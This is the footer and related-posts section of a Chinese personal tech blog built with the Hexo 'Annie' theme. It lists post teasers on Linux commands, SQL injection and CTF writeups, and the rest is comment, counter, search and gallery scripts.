						<img src="/images/post-cover/26.jpg" class="relateImg" alt="sql注入知识总结">
					</a>
				</li>											
		
		
				<li>
					<div>
						<a href="/2018/10/09/linux基本操作/" title="linux基本操作">
							linux基本操作
						</a>
						<p>
							centos常用命令及快捷键整理常用linux命令文件和目录cd /home                        进入 '/home' 目录
cd ..                                返回上一...
						</p>
					</div>

					<a href="/2018/10/09/linux基本操作/" title="linux基本操作">				
						<img src="/images/post-cover/30.jpg" class="relateImg" alt="linux基本操作">
					</a>
				</li>											
		
		
				<li>
					<div>
						<a href="/2018/10/08/linux查看系统信息/" title="linux查看系统信息">
							linux查看系统信息
						</a>
						<p>
							linux系统下经常查看各种信息，总结一下。
系统uname -a               # 查看内核/操作系统/CPU信息
head -n 1 /etc/issue   # 查看操作系统版本
cat /etc/issue | ...
						</p>
					</div>

					<a href="/2018/10/08/linux查看系统信息/" title="linux查看系统信息">				
						<img src="/images/post-cover/29.jpg" class="relateImg" alt="linux查看系统信息">
					</a>
				</li>											
		
		
				<li>
					<div>
						<a href="/2020/02/27/linux三剑客/" title="linux三剑客">
							linux三剑客
						</a>
						<p>
							前言之前用一些脚本都经常用到grep,sed,awk。但是一直不太熟悉，今天来学习一下，做个备忘录。
grep格式：
grep [OPTIONS] PATTERN [FILE...]
grep [OPTIONS] [-e PATTER...
						</p>
					</div>

					<a href="/2020/02/27/linux三剑客/" title="linux三剑客">				
						<img src="/images/post-cover/39.jpg" class="relateImg" alt="linux三剑客">
					</a>
				</li>											
		
		
				<li>
					<div>
						<a href="/2020/02/24/i春秋2020新春战“疫”网络安全公益赛-web-Writeup/" title="i春秋2020新春战“疫”网络安全公益赛 web Writeup">
							i春秋2020新春战“疫”网络安全公益赛 web Writeup
						</a>
						<p>
							前言这次比赛题目质量挺好的，除啦环境可能有时候有点问题。（就让我遇到了。心态炸了一天。。。）其他都挺好的。
DAY1简单的招聘系统知识点：sql注入的联合注入或盲注存在注册和登陆功能，首先进行注册后登陆进系统，发现有一个模块是管理员才...
						</p>
					</div>

					<a href="/2020/02/24/i春秋2020新春战“疫”网络安全公益赛-web-Writeup/" title="i春秋2020新春战“疫”网络安全公益赛 web Writeup">				
						<img src="/images/post-cover/6.jpg" class="relateImg" alt="i春秋2020新春战“疫”网络安全公益赛 web Writeup">
					</a>
				</li>											
		
		
				<li>
					<div>
						<a href="/2019/12/02/计算机组成原理学习/" title="计算机组成原理学习">
							计算机组成原理学习
						</a>
						<p>
							计算机组成原理第一章 计算机系统概论计算机系统的层次结构
冯·诺依曼计算机的特点

计算机由运算器、存储器、控制器、输入设备和输出设备五大部件组成
指令(程序)和数据以二进制同等地位地存储在存储器中，可按址寻访
指令由操作码和地址码组...
						</p>
					</div>

					<a href="/2019/12/02/计算机组成原理学习/" title="计算机组成原理学习">				
						<img src="/images/post-cover/38.jpg" class="relateImg" alt="计算机组成原理学习">
					</a>
				</li>											
		
		
				<li>
					<div>
						<a href="/2019/12/01/2019安洵杯-2019广外比赛web部分题解/" title="2019安洵杯+2019广外比赛web部分题解">
							2019安洵杯+2019广外比赛web部分题解
						</a>
						<p>
							2019安洵杯easy_web知识点：MD5强碰撞，命令执行这个题比较简单，看题目发现传入参数img和cmd，然而图片是传入的img参数控制，让我想到ddctf的一道题，然后发现img是通过把文件名进行转十六进制后两次base64编码...
						</p>
					</div>

					<a href="/2019/12/01/2019安洵杯-2019广外比赛web部分题解/" title="2019安洵杯+2019广外比赛web部分题解">				
						<img src="/images/post-cover/37.jpg" class="relateImg" alt="2019安洵杯+2019广外比赛web部分题解">
					</a>
				</li>											
		
		
	</ul>
</div>	
			</div>
			<div class="investment-content-list">
				<div class="layout-comment">

	

		

			<!-- comment gitalk -->
			<!-- show gitalk comment -->
<div id="gitalk-container"></div>

<!-- gitalk`s css & js -->
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<link rel="stylesheet" href="/css/comment.css">
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

<script type="text/javascript">
	//Thanks O-R
	//https://github.com/gitalk/gitalk/issues/102#issuecomment-382970552
	//去除尾部匹配正则数组的字符串  
	//Remove redundant characters
	String.prototype.trimEnd = function(regStr) {
		var result = this;
		if(regStr == undefined || regStr == null || regStr == "") {
			return result;
		}
		var array = regStr.split(',');

		if(array.length > 0) {

			var c = array.shift();
			var str = this;
			var i = str.length;
			var rg = new RegExp(c);
			var matchArr = str.match(rg);

			if(matchArr != undefined && matchArr != null && matchArr.length > 0) {
				var matchStr = matchArr[0].replace(/\\/g, "\\\\").replace(/\*/g, "\\*")
					.replace(/\+/g, "\\+").replace(/\|/g, "\\|")
					.replace(/\{/g, "\\{").replace(/\}/g, "\\}")
					.replace(/\(/g, "\\(").replace(/\)/g, "\\)")
					.replace(/\^/g, "\\^").replace(/\$/g, "\\$")
					.replace(/\[/g, "\\[").replace(/\]/g, "\\]")
					.replace(/\?/g, "\\?").replace(/\,/g, "\\,")
					.replace(/\./g, "\\.").replace(/\&/g, "\\&");
				matchStr = matchStr + '$';
				result = str.replace(new RegExp(matchStr), "");
			}

			if(array.length > 0) {
				return result.trimEnd(array.join())
			} else {
				return result;
			}
		}
	};

	//Create gitalk
	var gitalk = new Gitalk({
		clientID: 'b7a5e9f0853539dc3363',
		clientSecret: '3cd61bd5dfe5ddffe1c91e4392ca95874aade540',
		//id: window.location.pathname,
		//id: decodeURI(window.location.pathname),
		//id: (window.location.pathname).split("/").pop().substring(0, 49),
		id: decodeURI( md5( location.href.trimEnd('#.*$,\\?.*$,index.html$') ) ),
		repo: 'blog-Comment-Repo',
		owner: 'ab-Alex',
		admin: 'ab-Alex',
		distractionFreeMode: 'true',
	})
	gitalk.render('gitalk-container');
</script>

		
		
	

</div>
			</div>
		</div>	
	</div>
</div>



	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->



	<script>
		var appid = 'dXz',
            appkey = 'wzG';	  
        AnnieLeancloud(appid, appkey);         
	</script>
    


 

<!-- show math formula -->

	<script type="text/javascript" async src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-MML-AM_CHTML"></script>
	<script type="text/x-mathjax-config">
		MathJax.Hub.Config(
			{ 
				tex2jax: {
					inlineMath: [['$','$'], ['\\(','\\)']]
				} 
			}
		);
	</script>



<script>
	//Refer to https://xinyo.org/archives/66226, thanks xinyo!
	function codeCopy() {
		var copyContainerId = 'copy-nav';
						
		$("pre").before(" <nav class=' " + copyContainerId + " '><i class='code-language'></i></nav> ");
		
		$('.' + copyContainerId).append("<i class='fa fa-clipboard copy-btn' aria-hidden='true'></i>");
		
		$('#article-content').find('pre').each( function () {
			var language = $(this).children('code').attr('class').substr(9);//why 9? Need to check language?
			$(this).prev().find('.code-language').text( language );	
		});
				
		//为复制按钮添加click事件
		$('.copy-btn').on("click", function() {
			//初始化
			$("textarea").remove("#targetId");
			
			//获取对应的代码
			var codePre = $(this).parent().next(),
				codeText = codePre[0].textContent,
				target = document.createElement("textarea");
			target.style.position = "absolute";
			target.style.left = "-9999px";
			target.style.top = "0";
			target.id = "targetId";
			codePre.append(target);
			target.textContent = codeText;

			//选中textarea内的代码
			target.focus();
			target.setSelectionRange(0, target.value.length);

			// 复制选中的内容
			document.execCommand("copy");
			
			//删除添加的节点
			$("textarea").remove("#targetId");
			
			var thisCopied = $(this);
			thisCopied.addClass('copy-status');	
			setTimeout( function() {
				thisCopied.removeClass('copy-status');
			}, 2000)
		});	
	}
	
	if( $('.layout-post').length )	{
		codeCopy();
	}
</script>


<!-- TODO: There seems to be a bug when you close the post gallery! -->
<link rel="stylesheet" href="/plugin/lightgallery/css/lightgallery.css">
<script src="/plugin/lightgallery/js/jquery-1.11.0.min.js"></script>
<script src="/plugin/lightgallery/js/lightgallery-all.min.js"></script>

<script type="text/javascript">
	var postTitle = $('.article-title a').text() ? $('.article-title a').text() : "No post title!";
	$('.article-content img').each(function() {
		var imgPath = $(this).attr('src'),
			imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";
		$(this).wrap('<div class="img-responsive" data-src="' + imgPath + '" data-responsive="' + imgPath + '" data-sub-html="<p>图片 ' + imgTitle + '</p><h4>文章' + postTitle + '</h4>"></div>');
	});

	$('.article-content').lightGallery({
		mode: 'lg-slide',
		selector: '.img-responsive',
		share: false,
		zoom: false,
		download: false
	});
	//TODO：支持video
</script>

<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->

		

		<div class="k-catelog-list" id="catelog-list" data-title="文章目录"></div>
		<script src="/plugin/toc/katelog.min.js"></script>

		
	
		</main>
		
		<!--footer-->
		<footer>
	<div class="social">
		<ul>
	
		
			<li>
				<a href="http://github.com/" title="Github" target="_blank">
					<i class="fa fa-github"></i>
				</a>
			</li>
		
		
			<li>
				<a href="http://github.com/" title="Weibo" target="_blank">
					<i class="fa fa-weibo"></i>
				</a>
			</li>
		
		
			<li>
				<a href="mailto:http://github.com/" title="Email" target="_blank">
					<i class="fa fa-envelope-o"></i>
				</a>
			</li>
		

		
			<li>
				<a href="http://github.com/" title="QQ" target="_blank">
					<i class="fa fa-qq"></i>
				</a>
			</li>
		
		
			<li>
				<a href="http://github.com/" title="Twitter" target="_blank">
					<i class="fa fa-twitter"></i>
				</a>
			</li>
		
	 
</ul>
	</div>
		
	<div class="copyright">
		<p>
			 
				&copy;2017 - 2020, content by Alex. All Rights Reserved.
			
			
			

	<!-- busuanzi -->
	<!-- busuanzi -->

		
	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	

		<span id="busuanzi_container_page_pv">
	  		本文总阅读量<span id="busuanzi_value_page_pv"></span>次
		</span>

	




		</p>
		<p>
			<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay. 					
		</p>
	</div>		
</footer>
		
    <!-- set '1' to show motto in all pages! -->

	<script src="/js/motto.js"></script>
	<script type="text/javascript">
		$(".motto").html( getMingYanContent() );
	</script>	




    <!--
	时间：2018-10-3
	描述：
		插件名称：hexo-generator-search-zip
		插件来源: https://github.com/SuperKieran/hexo-generator-search-zip
		代码参考：https://github.com/SuperKieran/TKL/blob/master/layout/_partial/search.ejs(Include: js & css)	
-->
<div class="popup search-popup local-search-popup">
	<div class="local-search-container">
		<span class="popup-btn-close">
      ESC
   </span>
		<div class="local-search-header">
			<input autocomplete="off" placeholder="Search..." type="text" id="local-search-input">
		</div>
		<div class="local-search-body">
			<div id="local-search-output"></div>
		</div>
		<div class="local-search-footer">
			

   
	<div id="topN"></div>
	
    <script>
        var appid = 'dXz',
            appkey = 'wzG',
            limitCount = 10;
        if( $('#topN').length ){
            AV.initialize(appid, appkey);
            var Counter = AV.Object.extend("Counter");  
            topNPost(Counter, limitCount);
        }
    </script>
   

		</div>
	</div>
</div>

<script src="/js/ziploader.js"></script>
<script src="/js/search.js"></script>

<script type="text/javascript">
	var search_path = 'search.json',
		zip_Path = '/search.zip',
		version_Path = '/searchVersion.txt',
		input_Trigger = 'auto',
		top_N = '2';

	themeLocalSearch({
		search_path, 
		zip_Path, 
		version_Path, 
		input_Trigger, 
		top_N
	});
</script>



    <script src="/js/love.js"></script>


<!--back to top-->

    
	<div id="totop">
  		<a href="javascript:;"  name="TOTOP" class="fa fa-arrow-up" ></a>
	</div>
	<div id="tobuttom">
		<a href="javascript:;"  name="TOBUTTOM" class="fa fa-arrow-down" ></a>
	</div>
 


 

<script src="/js/vibrant.js"></script>
<script src="/js/chinese.js"></script>
<script src="/js/main.js"></script>
	</body>
	</html>
